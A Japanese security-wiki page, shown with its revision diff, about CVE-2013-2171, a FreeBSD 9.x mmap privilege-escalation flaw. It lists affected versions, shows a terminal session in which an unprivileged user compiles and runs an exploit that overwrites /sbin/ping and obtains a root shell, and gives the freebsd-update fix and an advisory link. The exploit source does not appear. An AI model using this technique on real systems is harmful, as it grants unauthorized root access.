「CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性」の版間の差分

提供: セキュリティ
移動: 案内検索
 
(同じ利用者による、間の1版が非表示)
行1: 行1:
<!--
+
CVE-2013-2171 は、 [[FreeBSD]] の mmap を利用した[[権限昇格]]の[[脆弱性]]です。
vim: filetype=mediawiki
+
-->
+
 
+
CVE-2013-2171 は、 [[FreeBSD]] の [[mmap]] を利用した[[権限昇格]]の[[脆弱性]]です。
+
 
+
  
 +
'''読み方'''
 +
;[[脆弱性]]:ぜいじゃくせい
 
__TOC__
 
__TOC__
  
 
== 概要 ==
 
== 概要 ==
 
+
CVE-2013-2171 は、 [[FreeBSD]] の mmap を利用した[[権限昇格]]の[[脆弱性]]です。
CVE-2013-2171 は、 [[FreeBSD]] の [[mmap]] を利用した[[権限昇格]]の[[脆弱性]]です。
+
  
 
FreeBSD 9.0+ 以上に影響があります。
 
FreeBSD 9.0+ 以上に影響があります。
 
FreeBSD 9.0R, FreeBSD 9.1R で試しました。
 
FreeBSD 9.0R, FreeBSD 9.1R で試しました。
 
 
== 使い方 ==
 
== 使い方 ==
 
 
[[権限昇格]]の例は、以下の通りです。
 
[[権限昇格]]の例は、以下の通りです。
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">
行35: 行29:
 
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)
 
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)
 
</syntaxhighlight>
 
</syntaxhighlight>
 
 
== 対処方法 ==
 
== 対処方法 ==
 
+
freebsd-update で更新します。
[[freebsd-update]] で更新します。
+
 
+
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">
 
% sudo freebsd-update fetch
 
% sudo freebsd-update fetch
 
% sudo freebsd-update install
 
% sudo freebsd-update install
 
</syntaxhighlight>
 
</syntaxhighlight>
 
 
== 関連項目 ==
 
== 関連項目 ==
 
 
* [[脆弱性]]
 
* [[脆弱性]]
 
* [http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc FreeBSD-SA-13:06.mmap.asc]
 
* [http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc FreeBSD-SA-13:06.mmap.asc]
 +
<!--
 +
vim: filetype=mediawiki
 +
-->

2015年9月22日 (火) 10:42時点における最新版

CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格脆弱性です。

読み方

脆弱性
ぜいじゃくせい

概要

CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格脆弱性です。

FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。

使い方

権限昇格の例は、以下の通りです。

vm% uname -a
FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0:
Mon Apr 29 18:11:52 UTC 2013
root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
vm% id
uid=1008(guest) gid=1001(users) groups=1001(users)
vm% gcc mmap.c
vm% ./a.out
[+] Saved old '/sbin/ping'
[+] Using mmap-ed area at 0x281a4000
[+] Attached to 58383
[+] Copied 4917 bytes of payload to '/sbin/ping'
[+] Triggering payload
# id
uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)

対処方法

freebsd-update で更新します。

% sudo freebsd-update fetch
% sudo freebsd-update install

関連項目